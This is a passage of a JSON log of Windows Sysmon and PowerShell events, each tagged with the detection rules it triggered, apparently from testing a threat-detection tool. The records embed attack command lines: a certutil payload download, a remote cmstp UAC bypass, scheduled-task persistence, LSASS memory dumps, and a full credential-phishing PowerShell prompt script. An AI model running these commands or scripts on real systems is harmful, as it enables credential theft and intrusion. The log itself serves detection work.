21:34:20.134"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4978,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:20.238305Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"EventData":{"CommandLine":"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-665C-5D3F-0000-0010096B8D00","ParentProcessId":7088,"ProcessGuid":"747F3D96-665C-5D3F-0000-0010E37B8D00","ProcessId":4520,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:20.410"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4980,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:20.459065Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bypass UAC via CMSTP"],"event":{"Event":{"EventData":{"CommandLine":"cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Connection Manager Profile Installer","FileVersion":"7.2.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=89030EB0DE2B856B47105CA67DAAC722ABAF0BDF,MD5=D9818B3C3BC0AF0A5374C71272581C08,SHA256=DB3F360BDB292C0679C13149AC6F454F7DCE768BDE559D87CE718023A6985A0D,IMPHASH=109BA8ED3C458360A74EA1216207CA09","Image":"C:\\Windows\\System32\\cmstp.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6661-5D3F-0000-00107AB88D00","ParentProcessId":6428,"ProcessGuid":"747F3D96-6661-5D3F-0000-0010CBC88D00","ProcessId":6820,"Product":"Microsoft(R) Connection Manager","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:25.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4985,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:25.659355Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","ParentImage":"C:\\Windows\\System32\\forfiles.exe","ParentProcessGuid":"747F3D96-6666-5D3F-0000-0010AE068E00","ParentProcessId":1464,"ProcessGuid":"747F3D96-6666-5D3F-0000-0010DF098E00","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:30.552"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4989,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:30.807635Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Calculator Usage"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6670-5D3F-0000-001099048F00","ProcessId":2916,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:40.243"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5000,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:40.261289Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Calculator Usage"],"event":{"Event":{"EventData":{"CommandLine":"schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Task Scheduler Configuration Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69","Image":"C:\\Windows\\System32\\schtasks.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6670-5D3F-0000-001099048F00","ParentProcessId":2916,"ProcessGuid":"747F3D96-6670-5D3F-0000-0010F9148F00","ProcessId":7076,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence - Scheduled Task Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:40.755"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5002,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:40.889027Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":768617,"Execution_attributes":{"ProcessID":264,"ThreadID":796},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-15T19:28:17.594374Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x4c331","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-AB27-5CB8-0000-002021CA0000","LogonId":"0xca21","ParentCommandLine":"Powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AC28-5CB8-0000-0010F3F70700","ParentProcessId":1200,"ProcessGuid":"365ABB72-AC38-5CB8-0000-0010365E0800","ProcessId":3576,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User 
Discovery","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-18 16:56:24.833"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":14,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-18T16:56:24.893827Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-AB27-5CB8-0000-002021CA0000","LogonId":"0xca21","ParentCommandLine":"Powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AC28-5CB8-0000-0010F3F70700","ParentProcessId":1200,"ProcessGuid":"365ABB72-AD19-5CB8-0000-0010F4F40C00","ProcessId":3980,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-18 
17:00:09.677"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":24,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-18T17:00:09.977481Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-18 17:03:03.311","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-AB28-5CB8-0000-0010F2E20000","ProcessId":1388,"RuleName":"technique_id=T1187,technique_name=Forced Authentication","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sysmon.evtx.lnk","UtcTime":"2019-04-18 17:03:03.311"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":32,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-18T17:03:03.321806Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-18 17:03:03.441","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-AB28-5CB8-0000-0010F2E20000","ProcessId":1388,"RuleName":"technique_id=T1187,technique_name=Forced Authentication","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HTools (vboxsrv) (D).lnk","UtcTime":"2019-04-18 17:03:03.441"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":33,"Execution_attributes":{"ProcessID":3192,"ThreadID":3288},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-18T17:03:03.441979Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PowerShell Credential Prompt"],"event":{"Event":{"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"","ScriptBlockId":"c7ca7056-b317-4fff-b796-05d8ef896dcd","ScriptBlockText":"function Invoke-LoginPrompt{\n$cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\")\n$username = \"$env:username\"\n$domain = \"$env:userdomain\"\n$full = \"$domain\" + \"\\\" + \"$username\"\n$password = $cred.GetNetworkCredential().password\nAdd-Type -assemblyname System.DirectoryServices.AccountManagement\n$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)\nwhile($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){\n $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\")\n $username = \"$env:username\"\n $domain = \"$env:userdomain\"\n $full = 
\"$domain\" + \"\\\" + \"$username\"\n $password = $cred.GetNetworkCredential().password\n Add-Type -assemblyname System.DirectoryServices.AccountManagement\n $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)\n $DS.ValidateCredentials(\"$full\", \"$password\") | out-null\n }\n $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password\n $output\n R{START_PROCESS}\n}\nInvoke-LoginPrompt"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"MSEDGEWIN10","Correlation_attributes":{"ActivityID":"B5ABE6C2-675C-0001-A601-ACB55C67D501"},"EventID":4104,"EventRecordID":1123,"Execution_attributes":{"ProcessID":5500,"ThreadID":356},"Keywords":"0x0","Level":3,"Opcode":15,"Provider_attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"},"Security_attributes":{"UserID":"S-1-5-21-3461203602-4096304019-2269080069-1000"},"Task":2,"TimeCreated_attributes":{"SystemTime":"2019-09-09T13:35:09.315230Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"IEWIN7","Correlation":null,"EventID":1102,"EventRecordID":4987,"Execution_attributes":{"ProcessID":824,"ThreadID":6060},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-04-27T19:27:55.274060Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"IEWIN7","SubjectLogonId":"0xffa8","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Suspicious Encoded PowerShell Command Line","Shells Spawned by Web Servers"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -noni -enc 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","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\Temp\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B26B-5CEA-0000-002023240800","LogonId":"0x82423","ParentCommandLine":"c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\" -v \"v2.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h \"C:\\inetpub\\temp\\apppools\\DefaultAppPool\\DefaultAppPool.config\" -w \"\" -m 0 
-t 20","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentProcessGuid":"365ABB72-3251-5CEB-0000-00109E06E100","ParentProcessId":748,"ProcessGuid":"365ABB72-3D4A-5CEB-0000-0010FA93FD00","ProcessId":2584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-27 01:28:42.700"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":5875,"Execution_attributes":{"ProcessID":324,"ThreadID":2260},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-27T01:28:42.711005Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File","Procdump Usage"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 19:09:41.318","Image":"C:\\Users\\IEUser\\Desktop\\procdump.exe","ProcessGuid":"365ABB72-9B75-5C8E-0000-0010013F1200","ProcessId":1856,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\lsass.exe_190317_120941.dmp","UtcTime":"2019-03-17 
19:09:41.318"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":4433,"Execution_attributes":{"ProcessID":344,"ThreadID":2032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T19:09:41.328868Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 19:10:02.058","Image":"C:\\Windows\\system32\\taskmgr.exe","ProcessGuid":"365ABB72-9B85-5C8E-0000-0010C4CC1200","ProcessId":3576,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\lsass (2).DMP","UtcTime":"2019-03-17 19:10:02.058"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":4441,"Execution_attributes":{"ProcessID":344,"ThreadID":2032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T19:10:03.991455Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WScript or CScript Dropper"],"event":{"Event":{"EventData":{"CommandLine":"cscript c:\\ProgramData\\memdump.vbs notepad.exe","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Console Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC","Image":"C:\\Windows\\System32\\cscript.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1B6A-5D69-0000-0020E5810E00","LogonId":"0xe81e5","ParentCommandLine":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1B6C-5D69-0000-00106F060F00","ParentProcessId":2128,"ProcessGuid":"747F3D96-1C6F-5D69-0000-0010323C1F00","ProcessId":2576,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-30 12:54:07.823"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":32151,"Execution_attributes":{"ProcessID":3292,"ThreadID":928},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-30T12:54:07.873789Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Modules Loaded"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"WMI","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=2E6A63BC5189CA5DF3E85CDF58593F3DF3935DE6,MD5=A081AAD3A296EB414CB6839B744C67C9,SHA256=3D77E7769CFC8B4A1098E9A1F2BDE4432A6A70253EA6C2A58C8F8403A9038288,IMPHASH=0D31E6D27B954AD879CB4DF742982F1A","Image":"C:\\Windows\\System32\\cscript.exe","ImageLoaded":"C:\\Windows\\System32\\wbem\\wmiutils.dll","ProcessGuid":"747F3D96-1C6F-5D69-0000-0010323C1F00","ProcessId":2576,"Product":"Microsoft® Windows® Operating System","RuleName":"Execution - Suspicious WMI module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-08-30 12:54:08.127"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":32153,"Execution_attributes":{"ProcessID":3292,"ThreadID":4120},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-08-30T12:54:08.257123Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Process Dump via Comsvcs DLL"],"event":{"Event":{"EventData":{"CommandLine":"rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 4868 C:\\Windows\\System32\\notepad.bin full","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 